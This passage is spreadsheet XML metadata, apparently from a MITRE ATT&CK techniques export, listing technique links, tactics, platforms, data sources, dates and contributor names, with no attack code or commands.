  <si>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File: File Access, Command: Command Execution, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Bernaldo Penas Antelo, Mugdha Peter Bansode, Uriel Kosayev, Vadim Khrykov</t>
  </si>
  <si>
    <t>Process: Process Access, Process: OS API Execution, File: File Access, Command: Command Execution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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1555/006</t>
  </si>
  <si>
    <t>25 September 2023</t>
  </si>
  <si>
    <t>Martin McCloskey, Datadog</t>
  </si>
  <si>
    <t>credential-access, defense-evasion, persistence</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</si>
  <si>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</si>
  <si>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Windows, Linux, macOS, Network, Azure AD, Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Process: Process Access, Logon Session: Logon Session Creation, Active Directory: Active Directory Object Modification, User Account: User Account Authentication, Process: OS API Execution, Windows Registry: Windows Registry Key Creation, File: File Creation, User Account: User Account Modification, File: File Modification, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Process: Process Access, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification, File: File Creation, Module: Module Load</t>
  </si>
  <si>
    <t>Scott Knight, @sdotknight, VMware Carbon Black, George Allen, VMware Carbon Black</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/005</t>
  </si>
  <si>
    <t>13 January 2022</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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Modification, Command: Command Execution, User Account: User Account Metadata, Script: Script Execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/006</t>
  </si>
  <si>
    <t>31 May 2022</t>
  </si>
  <si>
    <t>Windows, Azure AD, Office 365, SaaS, IaaS, Google Workspace, Linux, macOS</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Active Directory: Active Directory Object Modification, User Account: User Account Authentication, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Liran Ravich, CardinalOps, Muhammad Moiz Arshad, @5T34L7H</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/007</t>
  </si>
  <si>
    <t>28 September 2022</t>
  </si>
  <si>
    <t>Windows, Azure AD, SaaS, Google Workspace, Office 365, IaaS</t>
  </si>
  <si>
    <t>File: File Modification, Module: Module Load, Application Log: Application Log Content, Logon Session: Logon Session Creation</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/008</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch, Jai Minton</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</si>
  <si>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</si>
  <si>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credential-access, collection</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Windows Registry: Windows Registry Key Modification, Network Traffic: Network Traffic Flow, Service: Service Creation</t>
  </si>
  <si>
    <t>Mayuresh Dani, Qualys, Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project, NEC</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</si>
  <si>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</si>
  <si>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25 April 2023</t>
  </si>
  <si>
    <t>Service: Service Creation, Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Eric Kuehn, Secure Ideas, Matthew Demaske, Adaptforward, Andrew Allen, @whitehat_zero</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1557/003</t>
  </si>
  <si>
    <t>24 March 2022</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Content, Application Log: Application Log Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Alex Spivakovsky, Pentera, Andrew Allen, @whitehat_zero</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Logon Session: Logon Session Metadata, Active Directory: Active Directory Credential Request, File: File Access</t>
  </si>
  <si>
    <t>Tim (Wadhwa-)Brown, Cody Thomas, SpecterOps</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</si>
  <si>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</si>
  <si>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Yossi Nisani, Cymptom, James Dunn, @jamdunnDFW, EY, Swapnil Kumbhar, Jacques Pluviose, @Jacqueswildy_IT, Dan Nutting, @KerberToast</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</si>
  <si>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</si>
  <si>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Module: Module Load, Process: Process Creation, Script: Script Execution, Process: Process Access</t>
  </si>
  <si>
    <t>Administrator, User, SYSTEM</t>
  </si>
  <si>
    <t>Module: Module Load, Script: Script Execution, Process: Process Creation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: Process Creation, Module: Module Load, Script: Script Execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1559/003</t>
  </si>
  <si>
    <t>Csaba Fitzl @theevilbit of Offensive Security</t>
  </si>
  <si>
    <t>Command: Command Execution, Script: Script Execution, Process: Process Creation, File: File Creation</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</si>
  <si>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</si>
  <si>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Mayan Arora aka Mayan Mohan, Mark Wee</t>
  </si>
  <si>
    <t>Script: Script Execution, File: File Creation</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</si>
  <si>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</si>
  <si>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Driver: Driver Load, Drive: Drive Access, Command: Command Execution, Drive: Drive Modification, Process: Process Creation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Drive: Drive Modification, Drive: Drive Access, Driver: Driver Load, Command: Command Execution, Process: Process Creation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Driver: Driver Load, Drive: Drive Modification, Drive: Drive Access, Command: Command Execution, Process: Process Creation</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</si>
  <si>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</si>
  <si>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Windows, Office 365, IaaS, Linux, macOS, Containers, Network</t>
  </si>
  <si>
    <t>File: File Modification, Cloud Service: Cloud Service Disable, Firewall: Firewall Rule Modification, Command: Command Execution, Script: Script Execution, Process: Process Modification, Windows Registry: Windows Registry Key Deletion, Process: Process Termination, Service: Service Metadata, Cloud Service: Cloud Service Modification, User Account: User Account Modification, File: File Deletion, Sensor Health: Host Status, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification, Driver: Driver Load, Firewall: Firewall Disable</t>
  </si>
  <si>
    <t>Anti-virus, Signature-based detection, Host intrusion prevention systems, File monitoring, Digital Certificate Validation, Host forensic analysis, Log analysis, Firewall</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</si>
  <si>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</si>
  <si>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28 May 2023</t>
  </si>
  <si>
    <t>Windows, macOS, Linux, Containers, IaaS, Network</t>
  </si>
  <si>
    <t>Sensor Health: Host Status, Process: Process Termination, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification, Command: Command Execution, Windows Registry: Windows Registry Key Deletion, Driver: Driver Load</t>
  </si>
  <si>
    <t>Gordon Long, Box, Inc., @ethicalhax, Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security, Nathaniel Quist, Palo Alto Networks, Gal Singer, @galsinger29, Team Nautilus Aqua Security, Daniel Feichter, @VirtualAllocEx, Infosec Tirol, Cian Heasley, Alex Soler, AttackIQ, Sarathkumar Rajendran, Microsoft Defender365, Lucas Heiligenstein</t>
  </si>
  <si>
    <t>Anti-virus, Log analysis, Signature-based detection, Host intrusion prevention systems, File monitoring</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</si>
  <si>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</si>
  <si>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18 September 2023</t>
  </si>
  <si>
    <t>Sensor Health: Host Status, Command: Command Execution, Windows Registry: Windows Registry Key Modification, Script: Script Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team, Lucas Heiligenstein</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Sensor Health: Host Status, Command: Command Execution</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</si>
  <si>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</si>
  <si>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Firewall: Firewall Rule Modification, Windows Registry: Windows Registry Key Modification, Command: Command Execution, Firewall: Firewall Disable</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</si>
  <si>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</si>
  <si>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Rob Smith, Lucas Heiligenstein</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</si>
  <si>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</si>
  <si>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Disable or Modify Cloud Logs</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</si>
  <si>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</si>
  <si>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</si>
  <si>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IaaS, SaaS, Google Workspace, Azure AD, Office 365</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Modification, User Account: User Account Modification, Cloud Service: Cloud Service Disable</t>
  </si>
  <si>
    <t>Syed Ummar Farooqh, McAfee, Prasad Somasamudram, McAfee, Sekhar Sarukkai, McAfee, Ibrahim Ali Khan, Alex Soler, AttackIQ, Janantha Marasinghe, Matt Snyder, VMware, Joe Gumke, U.S. Bank</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Creation, Process: Process Creation, Windows Registry: Windows Registry Key Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>Jorell Magtibay, National Australia Bank Limited, Kiyohito Yamamoto, RedLark, NTT Communications, Yusuke Kubo, RedLark, NTT Communications</t>
  </si>
  <si>
    <t>Host Intrusion Prevention Systems, Anti-virus</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Mayuresh Dani, Qualys, Daniel Feichter, @VirtualAllocEx, Infosec Tirol, Arad Inbar, Fidelis Security</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/011</t>
  </si>
  <si>
    <t>Goldstein Menachem</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/012</t>
  </si>
  <si>
    <t>24 May 2023</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content, Command: Command Execution, Process: Process Creation, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>SYSTEM, root</t>
  </si>
  <si>
    <t>Process: Process Creation, Network Traffic: Network Traffic Content, Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Process: Process Creation, Command: Command Execution, Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Linux, macOS, Windows, Office 365</t>
  </si>
  <si>
    <t>File: File Metadata, Application Log: Application Log Content, Process: Process Creation, Command: Command Execution, File: File Modification, Firmware: Firmware Modification, Service: Service Creation, Windows Registry: Windows Registry Key Modification, Script: Script Execution, User Account: User Account Creation, Process: OS API Execution, User Account: User Account Metadata, File: File Creation</t>
  </si>
  <si>
    <t>Process: Process Creation, File: File Creation, File: File Metadata, Command: Command Execution</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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Modification, User Account: User Account Creation, Windows Registry: Windows Registry Key Modification, Process: Process Creation, Command: Command Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>File: File Modification, Command: Command Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, File: File Metadata, Process: OS API Execution</t>
  </si>
  <si>
    <t>Oddvar Moe, @oddvarmoe, Red Canary</t>
  </si>
  <si>
    <t>Firmware: Firmware Modification, File: File Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification, Image: Image Metadata, Service: Service Creation, Process: Process Creation, File: File Creation, Command: Command Execution</t>
  </si>
  <si>
    <t>Johann Rehberger, Janantha Marasinghe, Menachem Shafran, XM Cyber</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</si>
  <si>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</si>
  <si>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Windows, Office 365, Linux, macOS, Google Workspace</t>
  </si>
  <si>
    <t>Command: Command Execution, Application Log: Application Log Content, File: File Modification</t>
  </si>
  <si>
    <t>Dor Edry, Microsoft, Liran Ravich, CardinalOps</t>
  </si>
  <si>
    <t>File: File Metadata, Process: Process Creation, Command: Command Execution, File: File Creation</t>
  </si>
  <si>
    <t>Jaron Bradley @jbradley89, Ivan Sinyakov</t>
  </si>
  <si>
    <t>Notarization, Gatekeeper</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/010</t>
  </si>
  <si>
    <t>19 November 2021</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/011</t>
  </si>
  <si>
    <t>24 August 2023</t>
  </si>
  <si>
    <t>06 November 2023</t>
  </si>
  <si>
    <t>Viren Chaudhari, Qualys</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</si>
  <si>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</si>
  <si>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Process: OS API Execution, Network Traffic: Network Traffic Content, File: File Creation, Network Traffic: Network Traffic Flow, File: File Deletion, File: File Modification, File: File Metadata</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</si>
  <si>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</si>
  <si>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File: File Modification, File: File Creation, File: File Deletion</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</si>
  <si>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</si>
  <si>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Process: OS API Execution, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</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</si>
  <si>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</si>
  <si>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File: File Modification, File: File Deletion, Process: OS API Execution, File: File Metadata, File: File Creation</t>
  </si>
  <si>
    <t>User, Administrator, root, SYSTEM</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</si>
  <si>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</si>
  <si>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Linux, macOS, Windows, SaaS, Office 365, Google Workspace</t>
  </si>
  <si>
    <t>File: File Creation, Network Traffic: Network Traffic Flow, Application Log: Application Log Content, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Philip Winther, Ohad Zaidenberg, @ohad_mz, Liora Itkin, Liran Ravich, CardinalOps, Scott Cook, Capital One</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Application Log: Application Log Content, File: File Creation</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</si>
  <si>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</si>
  <si>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06 September 2023</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Traffic Flow, Application Log: Application Log Content, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Philip Winther, Shailesh Tiwary (Indian Army), Mark Wee, Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services), Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC), Kobi Haimovich, CardinalOps, Menachem Goldstein</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1566/004</t>
  </si>
  <si>
    <t>07 September 2023</t>
  </si>
  <si>
    <t>05 September 2023</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Connection Creation, Command: Command Execution, Network Traffic: Network Traffic Flow, File: File Access, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, File: File Access</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, File: File Access, Command: Command Execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1567/003</t>
  </si>
  <si>
    <t>27 February 2023</t>
  </si>
  <si>
    <t>04 May 2023</t>
  </si>
  <si>
    <t>Harun Küßner</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1567/004</t>
  </si>
  <si>
    <t>20 July 2023</t>
  </si>
  <si>
    <t>Windows, macOS, Linux, SaaS, Office 365, Google Workspace</t>
  </si>
  <si>
    <t>Yossi Weizman, Microsoft Threat Intelligence, Sunders Bruskin, Microsoft Threat Intelligence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</si>
  <si>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</si>
  <si>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Ryan Benson, Exabeam, Barry Shteiman, Exabeam, Sylvain Gil, Exabeam</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification, Process: Process Creation, Service: Service Creation, File: File Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>User, Administrator, SYSTEM, root</t>
  </si>
  <si>
    <t>Process: Process Creation, Command: Command Execution, Service: Service Creation, File: File Modification</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification, Network Traffic: Network Traffic Flow, Service: Service Creation, Process: Process Creation, Command: Command Execution</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Named Pipe: Named Pipe Metadata, Network Share: Network Share Access, Network Traffic: Network Traffic Flow, Command: Command Execution, Process: Process Creation, File: File Creation, Network Traffic: Network Traffic Content, File: File Metadata</t>
  </si>
  <si>
    <t>Shailesh Tiwary (Indian Army)</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</si>
  <si>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</si>
  <si>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persistence, privilege-escalation, defense-evasion</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification, File: File Creation, Module: Module Load, Process: Process Creation, Service: Service Metadata, File: File Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>File: File Modification, Module: Module Load, File: File Creation</t>
  </si>
  <si>
    <t>File: File Modification, Process: Process Creation, Module: Module Load, File: File Creation</t>
  </si>
  <si>
    <t>Module: Module Load, File: File Creation, File: File Modification</t>
  </si>
  <si>
    <t>27 October 2020</t>
  </si>
  <si>
    <t>Service: Service Metadata, File: File Modification, File: File Creation, Process: Process Creation, Module: Module Load</t>
  </si>
  <si>
    <t>Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t>File: File Creation, Command: Command Execution, Module: Module Load, Process: Process Creation, File: File Modification</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</si>
  <si>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</si>
  <si>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File: File Creation, Windows Registry: Windows Registry Key Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>Process: Process Creation, File: File Modification, File: File Creation</t>
  </si>
  <si>
    <t>File: File Modification, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>File: File Modification, File: File Creation, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification, Service: Service Modification, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Travis Smith, Tripwire, Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>Process: Process Creation, Windows Registry: Windows Registry Key Modification, Module: Module Load, Command: Command Execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/013</t>
  </si>
  <si>
    <t>25 February 2022</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</si>
  <si>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</si>
  <si>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Instance: Instance Metadata, Instance: Instance Stop, Snapshot: Snapshot Creation, Volume: Volume Modification, Instance: Instance Modification, Instance: Instance Creation, Volume: Volume Metadata, Instance: Instance Start, Cloud Service: Cloud Service Metadata, Volume: Volume Creation, Snapshot: Snapshot Modification, Snapshot: Snapshot Metadata, Volume: Volume Deletion, Snapshot: Snapshot Deletion, Instance: Instance Deletion</t>
  </si>
  <si>
    <t>Instance: Instance Metadata, Instance: Instance Deletion</t>
  </si>
  <si>
    <t>Instance: Instance Start, Instance: Instance Metadata, Instance: Instance Stop, Instance: Instance Modification</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1578/005</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft Threat Intelligence, Amir Gharib, Microsoft Threat Intelligence</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Instance: Instance Enumeration, Cloud Storage: Cloud Storage Enumeration, Volume: Volume Enumeration, Snapshot: Snapshot Enumeration</t>
  </si>
  <si>
    <t>Regina Elwell, Praetorian, Isif Ibrahima, Mandiant</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</si>
  <si>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</si>
  <si>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resource-development</t>
  </si>
  <si>
    <t>Internet Scan: Response Metadata, Internet Scan: Response Content, Domain Name: Active DNS, Domain Name: Passive DNS, Domain Name: Domain Registration</t>
  </si>
  <si>
    <t>Shailesh Tiwary (Indian Army), Goldstein Menachem</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</si>
  <si>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</si>
  <si>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Domain Name: Passive DNS, Domain Name: Domain Registration, Domain Name: Active DNS</t>
  </si>
  <si>
    <t>Wes Hurd, Vinayak Wadhwa, Lucideus, Deloitte Threat Library Team, Oleg Kolesnikov, Securonix, Menachem Goldstein</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</si>
  <si>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</si>
  <si>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Internet Scan: Response Metadata, Internet Scan: Response Content</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/007</t>
  </si>
  <si>
    <t>20 October 2022</t>
  </si>
  <si>
    <t>Awake Security</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1583/008</t>
  </si>
  <si>
    <t>17 April 2023</t>
  </si>
  <si>
    <t>Tom Hegel, Goldstein Menachem, Hiroki Nagahama, NEC Corporation, Manikantan Srinivasan, NEC Corporation India, Pooja Natarajan, NEC Corporation India, Juan Carlos Campuzano - Mnemo-CERT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</si>
  <si>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</si>
  <si>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Internet Scan: Response Content, Domain Name: Domain Registration, Domain Name: Active DNS, Domain Name: Passive DNS, Internet Scan: Response Metadata</t>
  </si>
  <si>
    <t>Jeremy Galloway, Shailesh Tiwary (Indian Army), Goldstein Menachem</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</si>
  <si>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</si>
  <si>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Jeremy Galloway</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</si>
  <si>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</si>
  <si>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</si>
  <si>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13 April 2023</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1584/007</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1585/003</t>
  </si>
  <si>
    <t>27 May 2022</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</si>
  <si>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</si>
  <si>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Francesco Bigarella</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</si>
  <si>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</si>
  <si>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Persona: Social Media, Network Traffic: Network Traffic Content</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</si>
  <si>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</si>
  <si>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Tristan Bennett, Seamless Intelligence, Bryan Onel</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1586/003</t>
  </si>
  <si>
    <t>21 October 2022</t>
  </si>
  <si>
    <t>Malware Repository: Malware Content, Malware Repository: Malware Metadata, Internet Scan: Response Content</t>
  </si>
  <si>
    <t>Certificate: Certificate Registration, Malware Repository: Malware Metadata, Internet Scan: Response Content, Malware Repository: Malware Content</t>
  </si>
  <si>
    <t>Malware Repository: Malware Metadata, Malware Repository: Malware Content</t>
  </si>
  <si>
    <t>SOCCRATES, Mnemonic AS</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</si>
  <si>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</si>
  <si>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reconnaissance</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</si>
  <si>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</si>
  <si>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Jannie Li, Microsoft Threat Intelligence Center (MSTIC)</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</si>
  <si>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</si>
  <si>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Vinayak Wadhwa, Lucideus, Lee Christensen, SpecterOps, Toby Kohlenberg</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1593/003</t>
  </si>
  <si>
    <t>09 August 2022</t>
  </si>
  <si>
    <t>26 October 2022</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</si>
  <si>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</si>
  <si>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Matt Burrough, @mattburrough, Microsoft, Vinayak Wadhwa, SAFE Security</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1595/003</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</si>
  <si>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</si>
  <si>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Jan Petrov, Citi, Elvis Veliz, Citi, Richard Julian, Citi</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</si>
  <si>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</si>
  <si>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Philip Winther, Sebastian Salla, McAfee, Robert Simmons, @MalwareUtkonos, Ohad Zaidenberg, @ohad_mz, Liora Itkin, Liran Ravich, CardinalOps, Scott Cook, Capital One</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Philip Winther, Sebastian Salla, McAfee, Robert Simmons, @MalwareUtkonos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</si>
  <si>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proxy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</si>
  <si>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Philip Winther, Sebastian Salla, McAfee, Menachem Goldstein, Robert Simmons, @MalwareUtkonos, Elpidoforos Maragkos, @emaragkos, Joas Antonio dos Santos, @C0d3Cr4zy, Austin Herrin</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1598/004</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</si>
  <si>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</si>
  <si>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Firewall, System Access Controls</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Connection Creation</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</si>
  <si>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</si>
  <si>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Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018)</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</si>
  <si>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</si>
  <si>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SaaS, Windows, macOS, Linux, Azure AD, Office 365, Google Workspace, IaaS</t>
  </si>
  <si>
    <t>Web Credential: Web Credential Usage, Web Credential: Web Credential Creation, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>Dylan Silva, AWS Security</t>
  </si>
  <si>
    <t>Linux, macOS, Windows, SaaS, IaaS</t>
  </si>
  <si>
    <t>Jack Burns, HubSpot</t>
  </si>
  <si>
    <t>Azure AD, SaaS, Windows, Office 365, Google Workspace, IaaS</t>
  </si>
  <si>
    <t>Web Credential: Web Credential Usage, Web Credential: Web Credential Creation, Logon Session: Logon Session Creation, User Account: User Account Authentication, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender, Oleg Kolesnikov, Securonix, Jack Burns, HubSpot</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</si>
  <si>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</si>
  <si>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19 October 2022</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</si>
  <si>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</si>
  <si>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Kobi Haimovich, CardinalOps, Goldstein Menachem</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/006</t>
  </si>
  <si>
    <t>13 March 2023</t>
  </si>
  <si>
    <t>Goldstein Menachem, Vijay Lalwani, Will Thomas, Equinix Threat Analysis Center (ETAC), Will Jolliffe, Hiroki Nagahama, NEC Corporation, Manikantan Srinivasan, NEC Corporation India, Pooja Natarajan, NEC Corporation India</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro, David Fiser, @anu4is, Trend Micro, Brad Geesaman, @bradgeesaman, Center for Threat-Informed Defense (CTID), Magno Logan, @magnologan, Trend Micro, Vishwas Manral, McAfee, Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>defense-evasion, execution</t>
  </si>
  <si>
    <t>Container: Container Start, Application Log: Application Log Content, Pod: Pod Creation, Container: Container Creation, Pod: Pod Modification</t>
  </si>
  <si>
    <t>Pawan Kinger, @kingerpawan, Trend Micro, Alfredo Oliveira, Trend Micro, Idan Frimark, Cisco, Center for Threat-Informed Defense (CTID), Magno Logan, @magnologan, Trend Micro, Ariel Shuper, Cisco, Vishwas Manral, McAfee, Yossi Weizman, Azure Defender Research Team</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</si>
  <si>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</si>
  <si>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Windows, Linux, Containers</t>
  </si>
  <si>
    <t>Process: Process Creation, Kernel: Kernel Module Load, Container: Container Creation, Volume: Volume Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>Yuval Avrahami, Palo Alto Networks, Daniel Prizmant, Palo Alto Networks, Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics, Alfredo Oliveira, Trend Micro, David Fiser, @anu4is, Trend Micro, Idan Frimark, Cisco, Magno Logan, @magnologan, Trend Micro, Ariel Shuper, Cisco, Yossi Weizman, Azure Defender Research Team, Vishwas Manral, McAfee, CrowdStrike, Eran Ayalon, Cybereason, Oren Ofer, Cybereason, Ilan Sokol, Cybereason</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</si>
  <si>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</si>
  <si>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Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security, Roi Kol, @roykol1, Team Nautilus Aqua Security, Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security, Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>Pod: Pod Enumeration, Container: Container Enumeration</t>
  </si>
  <si>
    <t>Vishwas Manral, McAfee, Center for Threat-Informed Defense (CTID), Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Windows, Linux, macOS, IaaS</t>
  </si>
  <si>
    <t>Pooja Natarajan, NEC Corporation India, Hiroki Nagahama, NEC Corporation, Manikantan Srinivasan, NEC Corporation India, Wes Hurd, Katie Nickels, Red Canary</t>
  </si>
  <si>
    <t>Process: Process Creation, Process: OS API Execution, Windows Registry: Windows Registry Key Access, Command: Command Execution</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</si>
  <si>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</si>
  <si>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Script: Script Execution, Active Directory: Active Directory Object Access, Process: Process Creation, Command: Command Execution, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Ted Samuels, Rapid7, Jonhnathan Ribeiro, 3CORESec, @_w0rk3r</t>
  </si>
  <si>
    <t>Module: Module Load, Script: Script Execution, Process: OS API Execution</t>
  </si>
  <si>
    <t>João Paulo de A. Filho, @Hug1nN__, Shlomi Salem, SentinelOne, Lior Ribak, SentinelOne, Rex Guo, @Xiaofei_REX, Confluera, Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1621</t>
  </si>
  <si>
    <t>01 April 2022</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</si>
  <si>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</si>
  <si>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Windows, Office 365, Linux, macOS, IaaS, SaaS, Azure AD, Google Workspace</t>
  </si>
  <si>
    <t>User Account: User Account Authentication, Logon Session: Logon Session Metadata, Application Log: Application Log Content, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>Jon Sternstein, Stern Security, Pawel Partyka, Microsoft 365 Defender, Shanief Webb</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1622</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</si>
  <si>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</si>
  <si>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Process: Process Creation, Process: OS API Execution, Application Log: Application Log Content, Command: Command Execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1647</t>
  </si>
  <si>
    <t>09 April 2022</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1648</t>
  </si>
  <si>
    <t>SaaS, IaaS, Office 365</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Modification, Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Shailesh Tiwary (Indian Army), Praetorian, Oleg Kolesnikov, Securonix, Cisco, Varonis Threat Labs, Alex Soler, AttackIQ</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1649</t>
  </si>
  <si>
    <t>03 August 2022</t>
  </si>
  <si>
    <t>Windows, Linux, macOS, Azure AD</t>
  </si>
  <si>
    <t>Command: Command Execution, Application Log: Application Log Content, Active Directory: Active Directory Credential Request, Active Directory: Active Directory Object Modification, Windows Registry: Windows Registry Key Access, File: File Access, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>Tristan Bennett, Seamless Intelligence, Lee Christensen, SpecterOps, Thirumalai Natarajan, Mandiant</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1650</t>
  </si>
  <si>
    <t>10 March 2023</t>
  </si>
  <si>
    <t xml:space="preserve">Much of this takes place outside the visibility of the target organization, making detection difficult for defenders. 
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. </t>
  </si>
  <si>
    <t>Jeremy Kennelly, Jeffrey Barto</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1651</t>
  </si>
  <si>
    <t>IaaS, Azure AD</t>
  </si>
  <si>
    <t>Cisco, Nichols Jasper, Jared Wilson, Caio Silva, Adrien Bataille, Anders Vejlby, Nader Zaveri</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1652</t>
  </si>
  <si>
    <t>28 March 2023</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</si>
  <si>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</si>
